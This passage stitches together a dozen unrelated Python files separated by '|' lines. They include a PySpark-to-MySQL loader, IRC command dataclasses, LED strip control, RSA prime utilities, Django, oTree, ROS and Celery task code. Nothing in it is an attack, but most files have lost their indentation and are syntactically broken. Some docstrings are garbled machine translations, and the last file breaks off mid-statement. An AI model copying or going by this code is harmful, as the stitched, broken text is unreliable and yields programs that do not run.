# bio
bio_directed_node_sql_rdd = bio_directed_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "bio",\
is_directed = 1,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("bio_directed_node_sql_rdd.persist().is_cached:{0}".format(bio_directed_node_sql_rdd.persist().is_cached))
logging.info("bio_directed_node_sql_rdd.count():{0}".format(bio_directed_node_sql_rdd.count()))
logging.info("bio_directed_node_sql_rdd.take(3):{0}".format(bio_directed_node_sql_rdd.take(3)))
bio_undirected_node_sql_rdd = bio_undirected_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "bio",\
is_directed = 0,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("bio_undirected_node_sql_rdd.persist().is_cached:{0}".format(bio_undirected_node_sql_rdd.persist().is_cached))
logging.info("bio_undirected_node_sql_rdd.count():{0}".format(bio_undirected_node_sql_rdd.count()))
logging.info("bio_undirected_node_sql_rdd.take(3):{0}".format(bio_undirected_node_sql_rdd.take(3)))
# info
info_directed_node_sql_rdd = info_directed_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "info",\
is_directed = 1,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("info_directed_node_sql_rdd.persist().is_cached:{0}".format(info_directed_node_sql_rdd.persist().is_cached))
logging.info("info_directed_node_sql_rdd.count():{0}".format(info_directed_node_sql_rdd.count()))
logging.info("info_directed_node_sql_rdd.take(3):{0}".format(info_directed_node_sql_rdd.take(3)))
info_undirected_node_sql_rdd = info_undirected_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "info",\
is_directed = 0,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("info_undirected_node_sql_rdd.persist().is_cached:{0}".format(info_undirected_node_sql_rdd.persist().is_cached))
logging.info("info_undirected_node_sql_rdd.count():{0}".format(info_undirected_node_sql_rdd.count()))
logging.info("info_undirected_node_sql_rdd.take(3):{0}".format(info_undirected_node_sql_rdd.take(3)))
# social
social_directed_node_sql_rdd = social_directed_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "social",\
is_directed = 1,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("social_directed_node_sql_rdd.persist().is_cached:{0}".format(social_directed_node_sql_rdd.persist().is_cached))
logging.info("social_directed_node_sql_rdd.count():{0}".format(social_directed_node_sql_rdd.count()))
logging.info("social_directed_node_sql_rdd.take(3):{0}".format(social_directed_node_sql_rdd.take(3)))
social_undirected_node_sql_rdd = social_undirected_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "social",\
is_directed = 0,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("social_undirected_node_sql_rdd.persist().is_cached:{0}".format(social_undirected_node_sql_rdd.persist().is_cached))
logging.info("social_undirected_node_sql_rdd.count():{0}".format(social_undirected_node_sql_rdd.count()))
logging.info("social_undirected_node_sql_rdd.take(3):{0}".format(social_undirected_node_sql_rdd.take(3)))
# prepare to insert sql to database
node_sql_rdd_list = [bio_directed_node_sql_rdd, bio_undirected_node_sql_rdd,\
info_directed_node_sql_rdd, info_undirected_node_sql_rdd,\
social_directed_node_sql_rdd, social_undirected_node_sql_rdd]
cursor = self.con.cursor()
success_update = 0
failure_update = 0
split_num_for_each_rdd = 32
for rdd_idx in xrange(len(node_sql_rdd_list)):
node_sql_rdd = node_sql_rdd_list[rdd_idx]
logging.info("==========={0}th rdd_idx===========".format(rdd_idx))
sub_node_sql_rdd_list = node_sql_rdd.randomSplit(xrange(split_num_for_each_rdd))
for sub_rdd_idx in xrange(len(sub_node_sql_rdd_list)):
sub_rdd = sub_node_sql_rdd_list[sub_rdd_idx]
sub_node_sql_list = sub_rdd.collect()
logging.info("==========={0}th sub_rdd_idx===========".format(sub_rdd_idx))
for sql_idx in xrange(len(sub_node_sql_list)):
sql = sub_node_sql_list[sql_idx]
if (sql_idx % 10000 == 0 and sql_idx > 9998) or (sql_idx == len(sub_node_sql_list) -1):
logging.info("==========={0}th element in sub_node_sql_list===========".format(sql_idx))
logging.info("sql_execute_index:{idx}, finish rate:{rate}".format(idx = sql_idx, rate = float(sql_idx+1)/ len(sub_node_sql_list)))
logging.info("success_rate:{success_rate}".format(success_rate = success_update/ float(success_update + failure_update + 1)))
logging.info("success_update:{success}, failure_update:{failure}".format(success = success_update, failure = failure_update))
try:
cursor.execute(sql)
self.con.commit()
success_update = success_update + 1
except MySQLdb.Error, e:
self.con.rollback()
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
logging.error("error SQL:{0}".format(sql))
failure_update = failure_update + 1
cursor.close()
        # un-persist the previously persisted RDDs
        logging.info("bio_directed_node_sql_rdd.unpersist().is_cached:{0}".format(bio_directed_node_sql_rdd.unpersist().is_cached))
        logging.info("bio_undirected_node_sql_rdd.unpersist().is_cached:{0}".format(bio_undirected_node_sql_rdd.unpersist().is_cached))
        logging.info("info_directed_node_sql_rdd.unpersist().is_cached:{0}".format(info_directed_node_sql_rdd.unpersist().is_cached))
        logging.info("info_undirected_node_sql_rdd.unpersist().is_cached:{0}".format(info_undirected_node_sql_rdd.unpersist().is_cached))
        logging.info("social_directed_node_sql_rdd.unpersist().is_cached:{0}".format(social_directed_node_sql_rdd.unpersist().is_cached))
        logging.info("social_undirected_node_sql_rdd.unpersist().is_cached:{0}".format(social_undirected_node_sql_rdd.unpersist().is_cached))
################################### PART3 CLASS TEST ##################################
'''
# Initialization
database_name = "LinkPredictionDB"
connection_table_name = "connection_table"
node_table_name = "node_table"
from pyspark import SparkContext
pyspark_sc = SparkContext()
Computer = ComputeNodeProperty(database_name = database_name, pyspark_sc = pyspark_sc)
network_rdd_list = Computer.read_connection_data_in_database(database_name = database_name,\
connection_table_name = connection_table_name)
node_data_rdd_list = Computer.compute_degree_in_different_network(network_rdd_list = network_rdd_list)
Computer.save_node_data_rdd_list_to_database(database_name = database_name,\
node_table_name = node_table_name,\
node_data_rdd_list = node_data_rdd_list)
'''
|
from dataclasses import dataclass
from typing import Optional
@dataclass
class Endpoint:
host: str
port: int
ssl: bool
@dataclass
class Credentials:
username: str
password: str
@dataclass
class RawCommand:
prefix: str
command: str
args: list[str]
class Command:
def to_irc(self) -> str:
raise NotImplementedError
@staticmethod
def from_raw_command(raw_command: RawCommand) -> "Command":
raise NotImplementedError
@dataclass
class Pass(Command):
password: str
def to_irc(self) -> str:
return f"PASS {self.password}"
@dataclass
class Nick(Command):
nick: str
def to_irc(self) -> str:
return f"NICK {self.nick}"
@dataclass
class Privmsg(Command):
target: str
message: str
user: Optional[str] = None
def to_irc(self) -> str:
return f"PRIVMSG {self.target} : {self.message}"
@staticmethod
def from_raw_command(raw_command: RawCommand) -> "Privmsg":
target = raw_command.args[0]
message = raw_command.args[1]
user = raw_command.prefix.split("!")[0]
return Privmsg(target, message, user)
@dataclass
class Ping(Command):
message: str
@staticmethod
def from_raw_command(raw_command: RawCommand) -> "Ping":
message = raw_command.args[0]
return Ping(message)
@dataclass
class Pong(Command):
message: str
def to_irc(self) -> str:
return f"PONG :{self.message}"
@dataclass
class Join(Command):
channel: str
def to_irc(self) -> str:
return f"JOIN #{self.channel}"
@dataclass
class Part(Command):
channel: str
def to_irc(self) -> str:
return f"PART #{self.channel}"
IRC_DATACLASS_MAP = {
"PRIVMSG": Privmsg,
"PING": Ping,
}
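# Minimal dispatch sketch (assumed usage; the parser that splits raw IRC lines
# into RawCommand objects is not shown in this module): look up the dataclass
# for a command and answer a PING with a PONG.
if __name__ == "__main__":
    raw = RawCommand(prefix="", command="PING", args=["irc.example.net"])
    command_cls = IRC_DATACLASS_MAP.get(raw.command)
    if command_cls is not None:
        cmd = command_cls.from_raw_command(raw)
        if isinstance(cmd, Ping):
            print(Pong(cmd.message).to_irc())  # -> PONG :irc.example.net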
|
# LIFO queues
# LIFO stands for "last in, first out". A LifoQueue behaves like a stack: the element you put in last is the first one you get back out.
import queue
q = queue.LifoQueue()
numbers = [1, 2, 3, 4, 5]
for x in numbers:
q.put(x)
while not q.empty():
print(q.get())
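# Expected output of the loop above: 5, 4, 3, 2, 1 (reverse insertion order).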
# Priority queues
q = queue.PriorityQueue()
q.put((8, "Some string"))
q.put((1, 2023))
q.put((90, True))
q.put((2, 10.23))
while not q.empty():
print(q.get()) # Or q.get()[1] to access only the actual value
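# Entries come back in ascending order of the first tuple element (the priority),
# so the loop above prints (1, 2023), (2, 10.23), (8, 'Some string'), (90, True).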
|
from tests.utils import W3CTestCase
class TestDisplayInlineGrid(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'display-inline-grid'))
|
#!/usr/bin/python
import time
from neopixel import *
import argparse
import sys
# LED strip configuration:
LED_COUNT = 3 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 50 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0
LED_STRIP = ws.WS2812_STRIP
#LED_STRIP = ws.SK6812W_STRIP
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
# Initialize the library (must be called once before other functions).
strip.begin()
try:
for i in range(4):
strip.setPixelColor(0, Color(0, 200, 0))
strip.setPixelColor(1, Color(0, 200, 0))
strip.setPixelColor(2, Color(0, 200, 0))
strip.show()
time.sleep(1)
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
time.sleep(0.5)
while True:
line = raw_input ()
if line == "ON":
strip.setPixelColor(0, Color(255, 200, 0))
strip.setPixelColor(1, Color(255, 200, 0))
strip.setPixelColor(2, Color(255, 200, 0))
strip.show()
elif line == "BLUE":
strip.setPixelColor(0, Color(0, 0, 255))
strip.setPixelColor(1, Color(0, 0, 255))
strip.setPixelColor(2, Color(0, 0, 255))
strip.show()
elif line == "QUIT":
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
break
else:
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
except KeyboardInterrupt:
print "Shutting down"
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
|
from rest_framework import serializers
from .models import DigitalBookPDF
class DigitalBookPDFSerializer(serializers.ModelSerializer):
class Meta:
model = DigitalBookPDF
fields = (
'id',
'book',
'pdf',
)
|
import collections
class NyotaUhura:
def valid_no_decrease(self, start, end):
validcodes = []
for code in range(start, end):
code = str(code)
decrease = False
for pos in range(0, len(code)-1):
value1 = int(code[pos])
value2 = int(code[pos+1])
calc = value2 - value1
if calc < 0:
decrease = True
if not decrease:
validcodes.append(code)
return validcodes
def valid_same(self, codes):
validcodes = []
for code in codes:
same = False
for pos in range(0, len(code)-1):
value1 = int(code[pos])
value2 = int(code[pos+1])
calc = value2 - value1
if calc == 0:
same = True
if same:
validcodes.append(code)
return validcodes
def valid_larger_group(self, codes):
validcodes = []
for code in codes:
c=collections.Counter(code)
large = False
for count in c.values():
count = int(count)
if count == 2:
large = True
if large:
validcodes.append(code)
return validcodes
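# Minimal usage sketch (assumed; the range below is only an illustrative example,
# not an input from the original): chain the three filters to keep codes whose
# digits never decrease, contain a repeated digit, and contain at least one group
# of exactly two equal digits.
if __name__ == "__main__":
    checker = NyotaUhura()
    codes = checker.valid_no_decrease(122340, 122350)
    codes = checker.valid_same(codes)
    codes = checker.valid_larger_group(codes)
    print(len(codes), codes)  # -> 6 codes: '122344' .. '122349'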
|
"""
A single regression test case.
"""
import unittest
from regression_tests.test_case_name import TestCaseName
from regression_tests.utils.os import make_dir_name_valid
class TestCase:
"""A single regression test case."""
# Prevent nosetests from considering this class as a class containing unit
# tests.
__test__ = False
def __init__(self, test_module, test_class, test_settings):
"""
:param ~regression_tests.test_module.TestModule test_module: Testing
module.
:param ~regression_tests.test.Test test_class: Testing class.
        :param ~regression_tests.test_settings.TestSettings test_settings: Settings for the
test.
"""
self._test_module = test_module
self._test_class = test_class
self._test_settings = test_settings
@property
def test_module(self):
"""The testing module
(:class:`~regression_tests.test_module.TestModule`).
"""
return self._test_module
@property
def test_class(self):
"""The testing class (:class:`~regression_tests.test.Test`).
"""
return self._test_class
@property
def test_settings(self):
"""The test settings
(:class:`~regression_tests.test_settings.TestSettings`).
"""
return self._test_settings
@property
def name(self):
"""Name of the test case (:class:`.TestCaseName`)."""
return TestCaseName.from_tool_arguments(
self.test_class.__name__,
self._tool_arguments
)
@property
def module_name(self):
"""Name of the module in which the test case is located (`str`)."""
return self.test_module.name
@property
def full_name(self):
"""Full name of the test case (`str`), including module name."""
return '{}.{}'.format(
self.test_module.name,
self.name
)
@property
def dir(self):
"""Directory containing the test."""
return self.test_module.dir
@property
def tool(self):
"""Name of the tested tool."""
return self.test_settings.tool
@property
def tool_arguments(self):
"""Tool arguments for the test case."""
return self._tool_arguments.with_rebased_files(
inputs_dir=self.test_module.dir,
outputs_dir=self.tool_dir
)
@property
def tool_dir(self):
"""Directory for the outputs of the tool."""
outputs_dir = self.test_module.dir.get_dir(
self.test_settings.outputs_dir_name
)
return outputs_dir.get_dir(
make_dir_name_valid(
self.name,
path_to_dir=outputs_dir.path,
max_nested_file_length=self._max_file_length_in_tool_dir
)
)
@property
def tool_timeout(self):
"""Timeout for the tool."""
return self.test_settings.timeout
def create_test_suite(self, tool):
"""Creates a test suite for the given tool.
:param Tool tool: The tool for the suite.
"""
suite = unittest.TestSuite()
test_names = unittest.defaultTestLoader.getTestCaseNames(
self.test_class
)
for test_name in test_names:
suite.addTest(
self.test_class(
tool,
self.test_settings,
methodName=test_name
)
)
return suite
@property
def _tool_arguments(self):
"""Tool arguments."""
return self.test_settings.tool_arguments
@property
def _max_file_length_in_tool_dir(self):
"""Maximal length of a file in the tool directory."""
# We use a heuristic because we cannot foresee what file names may be
# generated in the future.
if not self.test_settings.input:
return 0
# When the 'input' contains multiple files in a tuple, we have to check
# all of them. To handle this uniformly, get an iterable of input files
# and iterate over this iterable. When there is a single input file,
# this iterable will be a singleton list.
if isinstance(self.test_settings.input, tuple):
input_files = self.test_settings.input
else:
input_files = [self.test_settings.input]
max_length = 0
for input_file in input_files:
# Reserve sufficient space for suffixes (e.g. "-unpacked" or
# ".c.backend.bc").
max_length += len(input_file) + 30
return max_length
|
# -*- coding: utf-8 -*-
"""与素数相关的数值函数
"""
from rsa._compat import range
import rsa.common
import rsa.randnum
__all__ = ['getprime', 'are_relatively_prime']
def gcd(p, q):
"""返回最大公约数,辗转相除法
>>> gcd(48, 180)
12
"""
while q != 0:
(p, q) = (q, p % q)
return p
def get_primality_testing_rounds(number):
"""返回几轮米勒Rabing素性测试的最低数量,
基于数字bitsize。
据NIST FIPS186-4,附录C,表C.3的最小数量
轮M-R的测试,使用的2 **(-100)的误差概率,对
不同P,Q bitsizes是:
* P,Q bitsize:512;回合:7
* P,Q bitsize:1024;回合:4
* P,Q bitsize:1536;回合:3
请参阅:http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf
"""
# Calculate number bitsize.
bitsize = rsa.common.bit_size(number)
# Set number of rounds.
if bitsize >= 1536:
return 3
if bitsize >= 1024:
return 4
if bitsize >= 512:
return 7
# For smaller bitsizes, set arbitrary number of rounds.
return 10
def miller_rabin_primality_testing(n, k):
"""计算n是复合(这是总是正确的)或总理
(理论上是不正确与错误概率4** - K),由
运用米勒 - 拉宾素性测试。
借鉴和实现的例子,请参阅:
https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test
:参数n为整数,为素性测试。
:N型:INT
:参数K:发米勒罗宾测试(证人)的数量。
:K型:INT
:返回:如果假数为复合材料,真要是它可能是素数。
:舍入类型:BOOL
"""
# prevent potential infinite loop when d = 0
if n < 2:
return False
# Decompose (n - 1) to write it as (2 ** r) * d
# While d is even, divide it by 2 and increase the exponent.
d = n - 1
r = 0
while not (d & 1):
r += 1
d >>= 1
# Test k witnesses.
for _ in range(k):
# Generate random integer a, where 2 <= a <= (n - 2)
a = rsa.randnum.randint(n - 3) + 1
x = pow(a, d, n)
if x == 1 or x == n - 1:
continue
for _ in range(r - 1):
x = pow(x, 2, n)
if x == 1:
# n is composite.
return False
if x == n - 1:
# Exit inner loop and continue with next witness.
break
else:
# If loop doesn't break, n is composite.
return False
return True
def is_prime(number):
"""如果是素数返回True.
>>> is_prime(2)
True
>>> is_prime(42)
False
>>> is_prime(41)
True
"""
    # Check small numbers directly.
if number < 10:
return number in {2, 3, 5, 7}
    # Even numbers (other than 2, handled above) are not prime.
if not (number & 1):
return False
    # Calculate the minimum number of testing rounds.
k = get_primality_testing_rounds(number)
    # Run (minimum + 1) rounds of primality testing.
return miller_rabin_primality_testing(number, k + 1)
def getprime(nbits):
"""返回有nbits位的素数.
>>> p = getprime(128)
>>> is_prime(p-1)
False
>>> is_prime(p)
True
>>> is_prime(p+1)
False
>>> from rsa import common
>>> common.bit_size(p) == 128
True
"""
    assert nbits > 3  # the loop will hang on too small numbers
while True:
integer = rsa.randnum.read_random_odd_int(nbits)
# Test for primeness
if is_prime(integer):
return integer
# Retry if not prime
def are_relatively_prime(a, b):
"""如果互质就返回True
>>> are_relatively_prime(2, 3)
True
>>> are_relatively_prime(2, 4)
False
"""
d = gcd(a, b)
return d == 1
if __name__ == '__main__':
print('Running doctests 1000x or until failure')
import doctest
for count in range(1000):
(failures, tests) = doctest.testmod()
if failures:
break
if count and count % 100 == 0:
print('%i times' % count)
print('Doctests done')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-04-03 20:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mathswizard', '0035_studentprofile_levelprog'),
]
operations = [
migrations.RenameField(
model_name='studentprofile',
old_name='levelProg',
new_name='levelprog',
),
]
|
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,
Currency as c, currency_range
)
import random
author = 'Your name here'
doc = """
Your app description
"""
class Constants(BaseConstants):
name_in_url = 'questionaire'
players_per_group = None
num_rounds = 1
class Subsession(BaseSubsession):
def creating_session(self):
players = self.get_players()
for p in players:
p.truth = random.randint(1, 6)
class Group(BaseGroup):
pass
class Player(BasePlayer):
truth = models.IntegerField()
choice = models.IntegerField(
        label='Report which number came up on the die. In addition to your main payoff, we will pay you that many HSE',
choices=[1,2,3,4,5,6],
widget=widgets.RadioSelectHorizontal
)
|
#!/usr/bin/env python
'''
This node is for combining all the sensor readings into a message and publishing on
/sensor_reading.
'''
import rospy
from ros_cellphonerobot.msg import Sensors
from sensor_msgs.msg import Range
def cb(msg):
    global sensor_readings
    # Reuse the shared Sensors message and update its distance field.
    message = sensor_readings
    message.distance = msg
pub.publish(message)
rospy.loginfo("Update distance")
if __name__ == '__main__':
try:
sensor_readings = Sensors()
rospy.init_node("sensor_hub", anonymous=True)
rospy.Subscriber("distance", Range ,cb)
pub = rospy.Publisher("sensor_reading", Sensors, queue_size=10)
rospy.spin()
except rospy.ROSInterruptException:
pass
|
from data_importers.management.commands import BaseHalaroseCsvImporter
class Command(BaseHalaroseCsvImporter):
council_id = "E07000029"
addresses_name = (
"parl.2019-12-12/Version 1/polling_station_export-2019-11-14cope.csv"
)
stations_name = (
"parl.2019-12-12/Version 1/polling_station_export-2019-11-14cope.csv"
)
elections = ["parl.2019-12-12"]
allow_station_point_from_postcode = False
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.uprn.strip().lstrip("0")
if uprn == "10000901653":
rec["postcode"] = "CA27 0AT"
if record.housepostcode in [
"CA28 6AQ",
"CA20 1EE",
]:
return None
if uprn in [
"10000896294", # CA191XR -> CA191XG : Whitegarth, Drigg, Holmrook, Cumbria
"10000893985", # CA191UU -> CA191TJ : Birkerthwaite, Birker Moor, Eskdale Green, Eskdale, Cumbria
"100110689644", # LA195UR -> LA195UD : Shannon Rise, Summer Hill, Bootle, Millom, Cumbria
]:
rec["accept_suggestion"] = True
if uprn in [
"10000896318", # CA191XD -> CA191XE : Sandford, Drigg, Holmrook, Cumbria
"100110311815", # LA184DE -> LA184DG : 49 Wellington Street, Millom, Cumbria
"10000897219", # LA195UP -> LA195UR : Moor Green, Whitbeck, Millom, Cumbria
"10000891448", # CA263XG -> CA263XF : Tile Kiln, Arlecdon Park Road, Arlecdon, Frizington, Cumbria
"10000904699", # CA145UJ -> LA184EY : 3 Globe Terrace, Main Street, Distington, Workington, Cumbria
]:
rec["accept_suggestion"] = False
return rec
|
from .backend import *
from .frontend import *
from .preprocessing import *
from .utils import *
|
from __future__ import division
import json
from collections import OrderedDict
from datetime import timedelta
from decimal import Decimal, ROUND_UP
import numpy as np
from django.conf import settings
from django.contrib.auth.models import User
from django.db import connection, transaction
from django.db.models import F, Q
from django.utils import timezone
from ws4redis.publisher import RedisPublisher
from ws4redis.redis_store import RedisMessage
import constants
from crowdsourcing import models
from crowdsourcing.crypto import to_hash
from crowdsourcing.emails import send_notifications_email, send_new_tasks_email, send_task_returned_email, \
send_task_rejected_email, send_project_completed
from crowdsourcing.payment import Stripe
from crowdsourcing.redis import RedisProvider
from crowdsourcing.utils import hash_task
from csp.celery import app as celery_app
from mturk.tasks import get_provider
def _expire_returned_tasks():
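    # Mark task workers that were returned more than settings.EXPIRE_RETURNED_TASKS
    # days ago as expired, refund them and update the worker cache; weekends are skipped.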
now = timezone.now()
if now.weekday() in [5, 6]:
return 'WEEKEND'
# noinspection SqlResolve
query = '''
with task_workers as (
SELECT *
FROM (
SELECT
tw.id,
CASE WHEN EXTRACT(DOW FROM now()) <= %(dow)s
THEN tw.returned_at + INTERVAL %(exp_days)s
ELSE tw.returned_at END returned_at
FROM crowdsourcing_taskworker tw
INNER JOIN crowdsourcing_task t ON tw.task_id = t.id
WHERE tw.status = %(status)s) r
WHERE (now() - INTERVAL %(exp_days)s)::timestamp > r.returned_at
)
UPDATE crowdsourcing_taskworker tw_up SET status=%(expired)s, updated_at=now()
FROM task_workers
WHERE task_workers.id=tw_up.id
RETURNING tw_up.id, tw_up.worker_id
'''
cursor = connection.cursor()
cursor.execute(query,
{
'status': models.TaskWorker.STATUS_RETURNED,
'expired': models.TaskWorker.STATUS_EXPIRED,
'exp_days': '{} day'.format(settings.EXPIRE_RETURNED_TASKS),
'dow': settings.EXPIRE_RETURNED_TASKS
})
workers = cursor.fetchall()
cursor.close()
worker_list = []
task_workers = []
for w in workers:
worker_list.append(w[1])
task_workers.append({'id': w[0]})
refund_task.delay(task_workers)
update_worker_cache.delay(worker_list, constants.TASK_EXPIRED)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def expire_tasks():
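    # Expire in-progress task workers whose accumulated session time exceeds the
    # project timeout (24 hours when no timeout is set), refund the affected tasks
    # and refresh the per-worker cache counters.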
cursor = connection.cursor()
# noinspection SqlResolve
query = '''
WITH taskworkers AS (
SELECT
tw.id,
p.id project_id
FROM crowdsourcing_taskworker tw
INNER JOIN crowdsourcing_task t ON tw.task_id = t.id
INNER JOIN crowdsourcing_project p ON t.project_id = p.id
INNER JOIN crowdsourcing_taskworkersession sessions ON sessions.task_worker_id = tw.id
WHERE tw.status=%(in_progress)s
GROUP BY tw.id, p.id
HAVING sum(coalesce(sessions.ended_at, now()) - sessions.started_at) >
coalesce(p.timeout, INTERVAL '24 hour'))
UPDATE crowdsourcing_taskworker tw_up SET status=%(expired)s
FROM taskworkers
WHERE taskworkers.id=tw_up.id
RETURNING tw_up.id, tw_up.worker_id
'''
cursor.execute(query,
{'in_progress': models.TaskWorker.STATUS_IN_PROGRESS, 'expired': models.TaskWorker.STATUS_EXPIRED})
workers = cursor.fetchall()
cursor.close()
worker_list = []
task_workers = []
for w in workers:
worker_list.append(w[1])
task_workers.append({'id': w[0]})
refund_task.delay(task_workers)
update_worker_cache.delay(worker_list, constants.TASK_EXPIRED)
_expire_returned_tasks()
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def auto_approve_tasks():
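    # Auto-approve submissions older than settings.AUTO_APPROVE_FREQ hours, then
    # notify both the requester and the worker over the notifications channel.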
now = timezone.now()
# if now.weekday() in [5, 6]:
# return 'WEEKEND'
# if now.weekday() == 0 and now.hour < 15:
# return 'MONDAY'
cursor = connection.cursor()
# noinspection SqlResolve
query = '''
WITH taskworkers AS (
SELECT
tw.id,
p.id project_id,
p.group_id project_gid,
tw.task_id,
u.id user_id,
u.username,
u_worker.username worker_username
FROM crowdsourcing_taskworker tw
INNER JOIN crowdsourcing_task t ON tw.task_id = t.id
INNER JOIN crowdsourcing_project p ON t.project_id = p.id
INNER JOIN auth_user u ON p.owner_id = u.id
INNER JOIN auth_user u_worker ON tw.worker_id = u_worker.id
WHERE tw.submitted_at + INTERVAL %(auto_approve_freq)s < NOW()
AND tw.status=%(submitted)s)
UPDATE crowdsourcing_taskworker tw_up SET status=%(accepted)s, approved_at = %(approved_at)s,
auto_approved=TRUE
FROM taskworkers
WHERE taskworkers.id=tw_up.id
RETURNING tw_up.id, tw_up.worker_id, taskworkers.task_id, taskworkers.user_id, taskworkers.username,
taskworkers.project_gid, taskworkers.worker_username
'''
cursor.execute(query,
{'submitted': models.TaskWorker.STATUS_SUBMITTED,
'accepted': models.TaskWorker.STATUS_ACCEPTED,
'approved_at': now,
'auto_approve_freq': '{} hour'.format(settings.AUTO_APPROVE_FREQ)})
    rows = cursor.fetchall()
    task_workers = []
    for w in rows:
        task_workers.append({'id': w[0]})
post_approve.delay(w[2], 1)
redis_publisher = RedisPublisher(facility='notifications', users=[w[4], w[6]])
message = RedisMessage(
json.dumps({"event": 'TASK_APPROVED', "project_gid": w[5], "project_key": to_hash(w[5])}))
redis_publisher.publish_message(message)
cursor.close()
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def update_worker_cache(workers, operation, key=None, value=None):
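    # Keep the per-worker Redis hash in sync with task state changes: adjust the
    # in_progress/submitted/rejected/returned/approved counters, or update group
    # membership and profile fields, depending on the operation.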
provider = RedisProvider()
for worker in workers:
name = provider.build_key('worker', worker)
if operation == constants.TASK_ACCEPTED:
provider.hincrby(name, 'in_progress', 1)
elif operation == constants.TASK_SUBMITTED:
provider.hincrby(name, 'in_progress', -1)
provider.hincrby(name, 'submitted', 1)
elif operation == constants.TASK_REJECTED:
provider.hincrby(name, 'submitted', -1)
provider.hincrby(name, 'rejected', 1)
elif operation == constants.TASK_RETURNED:
provider.hincrby(name, 'submitted', -1)
provider.hincrby(name, 'returned', 1)
elif operation == constants.TASK_APPROVED:
provider.hincrby(name, 'submitted', -1)
provider.hincrby(name, 'approved', 1)
elif operation in [constants.TASK_EXPIRED, constants.TASK_SKIPPED]:
provider.hincrby(name, 'in_progress', -1)
elif operation == constants.ACTION_GROUP_ADD:
provider.set_add(name + ':worker_groups', value)
elif operation == constants.ACTION_GROUP_REMOVE:
provider.set_remove(name + ':worker_groups', value)
elif operation == constants.ACTION_UPDATE_PROFILE:
provider.set_hash(name, key, value)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def email_notifications():
users = User.objects.all()
url = '%s/%s/' % (settings.SITE_HOST, 'messages')
users_notified = []
for user in users:
email_notification, created = models.EmailNotification.objects.get_or_create(recipient=user)
if created:
# unread messages
message_recipients = models.MessageRecipient.objects.filter(
status__lt=models.MessageRecipient.STATUS_READ,
recipient=user
).exclude(message__sender=user)
else:
# unread messages since last notification
message_recipients = models.MessageRecipient.objects.filter(
status__lt=models.MessageRecipient.STATUS_READ,
created_at__gt=email_notification.updated_at,
recipient=user
).exclude(message__sender=user)
message_recipients = message_recipients.order_by('-created_at') \
.select_related('message', 'recipient', 'message__sender') \
.values('created_at', 'message__body', 'recipient__username', 'message__sender__username')
result = OrderedDict()
# group messages by sender
for message_recipient in message_recipients:
if message_recipient['message__sender__username'] in result:
result[message_recipient['message__sender__username']].append(message_recipient)
else:
result[message_recipient['message__sender__username']] = [message_recipient]
messages = [{'sender': k, 'messages': v} for k, v in result.items()]
if len(messages) > 0:
# send email
send_notifications_email(email=user.email, url=url, messages=messages)
users_notified.append(user)
# update the last time user was notified
models.EmailNotification.objects.filter(recipient__in=users_notified).update(updated_at=timezone.now())
return 'SUCCESS'
@celery_app.task(bind=True, ignore_result=True)
def create_tasks(self, tasks):
try:
with transaction.atomic():
task_obj = []
x = 0
for task in tasks:
x += 1
hash_digest = hash_task(task['data'])
t = models.Task(data=task['data'], hash=hash_digest, project_id=task['project_id'],
row_number=x)
task_obj.append(t)
models.Task.objects.bulk_create(task_obj)
models.Task.objects.filter(project_id=tasks[0]['project_id']).update(group_id=F('id'))
except Exception as e:
self.retry(countdown=4, exc=e, max_retries=2)
return 'SUCCESS'
@celery_app.task(bind=True, ignore_result=True)
def create_tasks_for_project(self, project_id, file_deleted):
project = models.Project.objects.filter(pk=project_id).first()
if project is None:
return 'NOOP'
previous_rev = models.Project.objects.prefetch_related('batch_files', 'tasks').filter(~Q(id=project.id),
group_id=project.group_id) \
